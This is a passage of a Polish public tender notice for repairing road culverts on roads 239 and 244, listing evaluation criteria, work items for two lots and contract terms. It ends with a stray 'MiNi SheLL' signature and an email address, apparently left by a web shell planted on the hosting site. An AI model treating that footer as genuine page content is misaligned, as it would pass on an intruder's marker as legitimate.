Kryterium cena będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w Formularzu oferty. Zamawiający ofercie o najniższej cenie przyzna 90 punktów, a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza. Liczba punktów w kryterium cena zostanie obliczona na podstawie powyższego wzoru.
2. Pg=Oferta oceniana:Oferta z najdłuższym terminem gwarancji X 10 pkt 
                       
Kryterium gwarancja będzie rozpatrywane na podstawie zadeklarowanego terminu udzielenia gwarancji na roboty podanego przez Wykonawcę w formularzu oferty. Liczba punktów  w kryterium gwarancja zostanie obliczona na podstawie powyższego wzoru i zgodnie z poniższym:
Najkrótszy możliwy termin udzielenia gwarancji na wykonanie robót  to 24 miesiące. Najdłuższy możliwy termin udzielenia gwarancji na wykonanie robót  to 60 miesięcy. 
Zamawiający pod pojęciem gwarancji rozumie również gwarancję z tytułu rękojmi za wady.   
Kryterium -Okres gwarancji (G) będzie rozpatrywane na podstawie gwarancji jakości   i rękojmi za wady na usługi objęte przedmiotem zamówienia, podanej przez Wykonawcę w pkt. 4 Formularza Oferty. Wykonawca musi zaoferować termin gwarancji w pełnych miesiącach..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Naprawa przepustów w ciągu drogi nr 239 w km 16+108  oraz 16+302..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2. Zakres robót objętych zamówieniem
2.1. Dla części nr 1:
Przedmiot zamówienia: Naprawa przepustów w ciągu drogi nr 239 w km 16+108        oraz 16+302.
 2.1.1.Zamówienie obejmuje następujący zakres robót:
1)Przepust dwururowy w km 16+108
-Ręczne ścinanie i karczowanie krzaków i podszycia - rzadkie
-Roboty ziemne ręczne z transportem urobku na odległość do 1 km - grunt kat. III
-Rozebranie ścian z kamienia o gr. ponad 30 do 40 cm na zaprawie cementowej
-Czyszczenie ręczne przy użyciu narzędzi ręcznych konstrukcji z kamienia
-Oczyszczanie z namułu przepustów rurowych o śr. 0,60 m i zamuleniu przewodu do 2/3 wysokości                        średnicy
-Oczyszczenie rowu z namułu z wyprofilowaniem skarp rowu przy gr. namułu do 60 cm
-Ręczna rozbiórka konstrukcji betonowych o gr. do 20 cm
-Uzupełnienie ścian z kamienia na zaprawie cementowej o gr. ścian do 30 cm
-Wykonanie i rozebranie deskowania belek i podciągów
-Przygotowanie i montaż zbrojenia z prętów stalowych żebrowych o śr. 8-12 cm
-Uzupełnienie betonem żwirowym B-20 żelbetowych elementów konstrukcyjnych - ławy i stopy
-Spoinowanie ścian z kamieni
-Ułożenie ścieków drogowych korytkowych o gr. 15 cm na podsypce cementowo - piaskowej
-Umocnienie skarp płytami ażurowymi na podsypce cementowo - piaskowej o gr. 5 cm  
-Wykonanie koryta na poszerzeniach chodników w gr. kat II-IV o gł. 10 cm 
-Bariery ochronne stalowe mostowe z pochwytem AH2 W1, wysokości 1,2 m
-Zakończenia barier stalowych ochronnych jednostronnych
2)Przepust w km 16+302
-Roboty ziemne ręczne z transportem urobku taczkami na odległość do 10 m - grunt kat. III
-Ręczna rozbiórka konstrukcji betonowych o gr. do 20 cm
-Wykonanie i rozebranie deskowania belek i podciągów
-Przygotowanie i montaż zbrojenia z prętów stalowych żebrowych o śr. 8-12 cm
-Uzupełnienie betonem żwirowym B-20 żelbetowych elementów konstrukcyjnych - belek, podciągów i wieńców
-Wykonanie izolacji przeciwwilgociowej pionowej z roztworu asfaltowego na zimno
-Ręczne zasypywanie wnęk za ścianami budowli wodnoinżynieryjnych warstwami ziemi o gr. 15 cm z zagęszczeniem
-Plantowanie (obrobienie na czysto) powierzchni skarp i korony nasypów w gruncie IV
3. Szczegółowy zakres i warunki wykonania robót określają:  kosztorys ofertowy, przedmiar robót oraz dokumentacja SST.
4. Wykonawca zobowiązany jest do zapewnienia bezpiecznych warunków ruchu drogowego  kołowego i pieszego w rejonie prowadzonych robót objętych umową na podstawie projektu tymczasowej organizacji ruchu (na czas prowadzonych robót) przekazanego przez Zamawiającego w dniu zawarciu umowy. 
5. Zaleca się, aby Wykonawcy dokonali wizji lokalnej na terenie realizacji przedmiotu zamówienia i w jego okolicy w celu dokonania oceny dokumentów i informacji przekazywanych w ramach niniejszego postępowania przez Zamawiającego.
6. Zamawiający informuje, że materiały z rozbiórek nie nadające się do ponownego wykorzystania są własnością Wykonawcy. Rodzaj materiałów oraz ich ilości nie nadające się do ponownego wbudowania określi w trakcie realizacji zamówienia inspektor nadzoru..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.22.11.11-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja na wykonanie usług - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Naprawa przepustów w ciągu drogi nr 244 w km 7+809  oraz 8+680.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2. Zakres robót objętych zamówieniem
2.2. Dla części nr 2:
Przedmiot zamówienia: Naprawa przepustów w ciągu drogi nr 244 w km 7+809  oraz 8+680
 2.2.1.Zamówienie obejmuje następujący zakres robót: 
1)Przepust w km 7+809
-Ręczne ścinanie i karczowanie krzaków i podszycia - rzadkie
-Roboty ziemne ręczne z transportem urobku na odległość do 1 km - grunt kat. III
-Rozebranie ścian żelbetowych o grubości do 30 cm z transportem gruzu na odległość do 10 km
-Oczyszczanie z namułu przepustów rurowych o śr. 0,60 m i zamuleniu przewodu do 2/3 wysokości                      średnicy
-Oczyszczenie rowu z namułu z wyprofilowaniem skarp rowu przy gr. namułu do 60 cm
-Rozplantowanie urobku po odmuleniu rowu o gr. ponad 30 do 40 cm 
-Ręczna częściowa rozbiórka konstrukcji betonowych o gr. do 40 cm
-Wykonanie i rozebranie deskowania belek i podciągów
-Przygotowanie i montaż zbrojenia z prętów stalowych żebrowych o śr. 8-12 cm
-Uzupełnienie betonem żwirowym B-20 żelbetowych elementów konstrukcyjnych - ławy i stopy
-Wykonanie izolacji przeciwwilgociowej pionowej z roztworu asfaltowego na zimno
-Ręczne zasypywanie wnęk za ścianami budowli wodnoinżynieryjnych warstwami ziemi o gr. 15 cm                                             z zagęszczeniem
-Umocnienie skarp płytami ażurowymi na podsypce cementowo - piaskowej o gr. 5 cm  
-Wykonanie koryta na poszerzeniach chodników w gr. kat II-IV o gł. 10 cm 
-Wykonanie warstwy odsączającej z zagęszczeniem o gr. 10 cm
-Ustawienie obrzeży betonowych 8x30x100 na podsypce cementowo - piaskowej
-Ułożenie nawierzchni chodnika z kostki betonowej szarej o gr. 6 cm na podsypce ce - piaskowej
-Montaż barier ochronnych rurowych
2)Przepust w km 8+680
-Roboty ziemne ręczne z transportem urobku taczkami na odległość do 10 m - grunt kat. III
-Oczyszczanie z namułu przepustów rurowych o śr. 0,60 m i zamuleniu przewodu do 2/3 wysokości                       średnicy
-Oczyszczenie rowu z namułu z wyprofilowaniem skarp rowu przy gr. namułu do 60 cm
-Rozplantowanie urobku po odmuleniu rowu o gr. ponad 30 do 40 cm 
-Wykonanie i rozebranie deskowania belek i podciągów
-Przygotowanie i montaż zbrojenia z prętów stalowych żebrowych o śr. 8-12 cm
-Uzupełnienie betonem żwirowym B-20 żelbetowych elementów konstrukcyjnych - belek, podciągów                          i wieńców
-Wykonanie izolacji przeciwwilgociowej pionowej z roztworu asfaltowego na zimno
-Ręczne zasypywanie wnęk za ścianami budowli wodnoinżynieryjnych warstwami ziemi o gr. 15 cm                                               z zagęszczeniem
-Plantowanie (obrobienie na czysto) powierzchni skarp i korony nasypów w gruncie IV.
-Umocnienie skarp płytami ażurowymi na podsypce cementowo - piaskowej o gr. 5 cm  
-Wykonanie koryta na poszerzeniach chodników w gr. kat II-IV o gł. 10 cm 
-Wykonanie warstwy odsączającej z zagęszczeniem o gr. 10 cm
-Ustawienie obrzeży betonowych 8x30x100 na podsypce cementowo - piaskowej
-Ułożenie nawierzchni chodnika z kostki betonowej o gr. 6 cm na podsypce cem. - piaskowej
-Montaż barier ochronnych rurowych

3. Szczegółowy zakres i warunki wykonania robót określają:  kosztorys ofertowy, przedmiar robót oraz dokumentacja SST.
4. Wykonawca zobowiązany jest do zapewnienia bezpiecznych warunków ruchu drogowego  kołowego i pieszego w rejonie prowadzonych robót objętych umową na podstawie projektu tymczasowej organizacji ruchu (na czas prowadzonych robót) przekazanego przez Zamawiającego w dniu zawarciu umowy. 
5. Zaleca się, aby Wykonawcy dokonali wizji lokalnej na terenie realizacji przedmiotu zamówienia i w jego okolicy w celu dokonania oceny dokumentów i informacji przekazywanych w ramach niniejszego postępowania przez Zamawiającego.
6. Zamawiający informuje, że materiały z rozbiórek nie nadające się do ponownego wykorzystania są własnością Wykonawcy. Rodzaj materiałów oraz ich ilości nie nadające się do ponownego wbudowania określi w trakcie realizacji zamówienia inspektor nadzoru..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.22.11.11-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja na wykonanie robót - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com